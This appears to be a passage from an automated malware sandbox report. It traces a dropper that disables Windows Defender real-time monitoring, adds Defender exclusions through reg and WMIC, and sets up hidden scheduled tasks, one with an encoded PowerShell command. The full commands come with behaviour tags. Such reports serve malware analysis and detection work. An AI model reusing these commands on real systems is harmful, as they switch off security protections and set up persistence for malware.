powershell.exepowershell.exeWMIC.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEpowershell.exepowershell.exeWMIC.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2644 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe Token: SeIncreaseQuotaPrivilege 2260 WMIC.exe Token: SeSecurityPrivilege 2260 WMIC.exe Token: SeTakeOwnershipPrivilege 2260 WMIC.exe Token: SeLoadDriverPrivilege 2260 WMIC.exe Token: SeSystemProfilePrivilege 2260 WMIC.exe Token: SeSystemtimePrivilege 2260 WMIC.exe Token: SeProfSingleProcessPrivilege 2260 WMIC.exe Token: SeIncBasePriorityPrivilege 2260 WMIC.exe Token: SeCreatePagefilePrivilege 2260 WMIC.exe Token: SeBackupPrivilege 2260 WMIC.exe Token: SeRestorePrivilege 2260 WMIC.exe Token: SeShutdownPrivilege 2260 WMIC.exe Token: SeDebugPrivilege 2260 WMIC.exe Token: SeSystemEnvironmentPrivilege 2260 WMIC.exe Token: SeRemoteShutdownPrivilege 2260 WMIC.exe Token: SeUndockPrivilege 2260 WMIC.exe Token: SeManageVolumePrivilege 2260 WMIC.exe Token: 33 2260 WMIC.exe Token: 34 2260 WMIC.exe Token: 35 2260 WMIC.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeDebugPrivilege 296 powershell.EXE Token: SeDebugPrivilege 1752 powershell.EXE Token: SeDebugPrivilege 2084 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1880 WMIC.exe Token: SeIncreaseQuotaPrivilege 1880 WMIC.exe Token: SeSecurityPrivilege 1880 WMIC.exe Token: SeTakeOwnershipPrivilege 1880 WMIC.exe Token: SeLoadDriverPrivilege 1880 WMIC.exe Token: SeSystemtimePrivilege 1880 WMIC.exe Token: SeBackupPrivilege 1880 WMIC.exe Token: SeRestorePrivilege 1880 WMIC.exe Token: SeShutdownPrivilege 1880 WMIC.exe Token: SeSystemEnvironmentPrivilege 1880 WMIC.exe Token: SeUndockPrivilege 1880 WMIC.exe Token: SeManageVolumePrivilege 1880 WMIC.exe Token: SeDebugPrivilege 1060 powershell.EXE Token: SeDebugPrivilege 556 powershell.exe Token: SeDebugPrivilege 1636 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1108 WMIC.exe Token: SeIncreaseQuotaPrivilege 1108 WMIC.exe Token: SeSecurityPrivilege 1108 WMIC.exe Token: SeTakeOwnershipPrivilege 1108 WMIC.exe Token: SeLoadDriverPrivilege 1108 WMIC.exe Token: SeSystemtimePrivilege 1108 WMIC.exe Token: SeBackupPrivilege 1108 WMIC.exe Token: SeRestorePrivilege 1108 WMIC.exe Token: SeShutdownPrivilege 1108 WMIC.exe Token: SeSystemEnvironmentPrivilege 1108 WMIC.exe Token: SeUndockPrivilege 1108 WMIC.exe Token: SeManageVolumePrivilege 1108 WMIC.exe Token: SeDebugPrivilege 1556 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1540 WMIC.exe Token: SeIncreaseQuotaPrivilege 1540 WMIC.exe Token: SeSecurityPrivilege 1540 WMIC.exe Token: SeTakeOwnershipPrivilege 1540 WMIC.exe Token: SeLoadDriverPrivilege 1540 WMIC.exe Token: SeSystemtimePrivilege 1540 WMIC.exe Token: SeBackupPrivilege 1540 WMIC.exe Token: SeRestorePrivilege 1540 WMIC.exe Token: SeShutdownPrivilege 1540 WMIC.exe Token: SeSystemEnvironmentPrivilege 1540 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exeInstall.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.exedescription pid process target process PID 2080 wrote to memory of 2776 2080 987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe Install.exe PID 2080 wrote to memory of 2776 2080 987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe Install.exe PID 2080 wrote to memory of 2776 2080 987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe Install.exe PID 2080 wrote to memory of 2776 2080 987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe Install.exe PID 2080 wrote to memory of 2776 2080 987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe Install.exe PID 2080 wrote to memory of 2776 2080 987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe Install.exe PID 2080 wrote to memory of 2776 2080 987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe Install.exe PID 2776 wrote to memory of 2964 2776 Install.exe cmd.exe PID 2776 wrote to memory of 2964 2776 Install.exe cmd.exe PID 2776 wrote to memory of 2964 2776 Install.exe cmd.exe PID 2776 wrote to memory of 2964 2776 Install.exe cmd.exe PID 2776 wrote to memory of 2964 2776 Install.exe cmd.exe PID 2776 wrote to memory of 2964 2776 Install.exe cmd.exe PID 2776 wrote to memory of 2964 2776 Install.exe cmd.exe PID 2964 wrote to memory of 2592 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2592 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2592 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2592 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2592 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2592 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2592 2964 cmd.exe forfiles.exe PID 2592 wrote to memory of 2652 2592 forfiles.exe cmd.exe PID 2592 wrote to memory of 2652 2592 forfiles.exe cmd.exe PID 2592 wrote to memory of 2652 2592 forfiles.exe cmd.exe PID 2592 wrote to memory of 2652 2592 forfiles.exe cmd.exe PID 2592 wrote to memory of 2652 2592 forfiles.exe cmd.exe PID 2592 wrote to memory of 2652 2592 forfiles.exe cmd.exe PID 2592 wrote to memory of 2652 2592 forfiles.exe cmd.exe PID 2652 wrote to memory of 2668 2652 cmd.exe reg.exe PID 2652 wrote to memory of 2668 2652 cmd.exe reg.exe PID 2652 wrote to memory of 2668 2652 cmd.exe reg.exe PID 2652 wrote to memory of 2668 2652 cmd.exe reg.exe PID 2652 wrote to memory of 2668 2652 cmd.exe reg.exe PID 2652 wrote to memory of 2668 2652 cmd.exe reg.exe PID 2652 wrote to memory of 2668 2652 cmd.exe reg.exe PID 2964 wrote to memory of 2672 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2672 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2672 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2672 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2672 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2672 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2672 2964 cmd.exe forfiles.exe PID 2672 wrote to memory of 2680 2672 forfiles.exe cmd.exe PID 2672 wrote to memory of 2680 2672 forfiles.exe cmd.exe PID 2672 wrote to memory of 2680 2672 forfiles.exe cmd.exe PID 2672 wrote to memory of 2680 2672 forfiles.exe cmd.exe PID 2672 wrote to memory of 2680 2672 forfiles.exe cmd.exe PID 2672 wrote to memory of 2680 2672 forfiles.exe cmd.exe PID 2672 wrote to memory of 2680 2672 forfiles.exe cmd.exe PID 2680 wrote to memory of 2716 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2716 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2716 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2716 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2716 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2716 2680 cmd.exe reg.exe PID 2680 wrote to memory of 2716 2680 cmd.exe reg.exe PID 2964 wrote to memory of 2656 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2656 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2656 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2656 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2656 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2656 2964 cmd.exe forfiles.exe PID 2964 wrote to memory of 2656 2964 cmd.exe forfiles.exe PID 2656 wrote to memory of 2604 2656 forfiles.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe"C:\Users\Admin\AppData\Local\Temp\987e81eaba927077be968768fa337bae2bbe38310a4fec0593c356e677e9c236.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\7zS25D8.tmp\Install.exe.\Install.exe /IwVludidZTK "385120" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2668
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2716
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2604
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2556
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2596
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2788
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2580
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2696
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2456
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2644 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2764
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵PID:2436
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵PID:2744
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2260 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\FfKflKD.exe\" PP /bPJdidHBBq 385120 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2372 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"3⤵PID:2020
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn btZaCbGShXZoJDfvCg4⤵PID:1812
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn btZaCbGShXZoJDfvCg5⤵PID:1804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 5963⤵
- Loads dropped DLL
- Program crash
PID:2780
-
C:\Windows\system32\taskeng.exetaskeng.exe {97C912D2-046B-47C5-AD47-0B5D7B995642} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:868
-
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\FfKflKD.exeC:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\FfKflKD.exe PP /bPJdidHBBq 385120 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2104 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:348
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2292
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1700
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1600
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2136
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2320
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2284
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2088
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2144
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2296
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2316
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2112
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2812
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2804
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2304 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1760
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkPSmwOOT" /SC once /ST 00:52:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:572 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkPSmwOOT"3⤵PID:580
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkPSmwOOT"3⤵PID:2288
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:944 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:2152
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1556 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gHaUAkFbh" /SC once /ST 00:20:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1540 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gHaUAkFbh"3⤵PID:1768
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gHaUAkFbh"3⤵PID:2388
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:1400
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2964
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:323⤵PID:2876
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:820 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:643⤵PID:1968
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2260 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:323⤵PID:2352
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵PID:1808
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:643⤵PID:1128
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵PID:2516
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\QqEAMUespgTHJnVz\fZNkQiVY\ODYHBdNCcqPVDlYF.wsf"3⤵PID:2436
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\QqEAMUespgTHJnVz\fZNkQiVY\ODYHBdNCcqPVDlYF.wsf"3⤵
- Modifies data under HKEY_USERS
PID:340 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2040 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1204 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1828 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2824 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:344 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2280 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2296 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2112 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2204 -
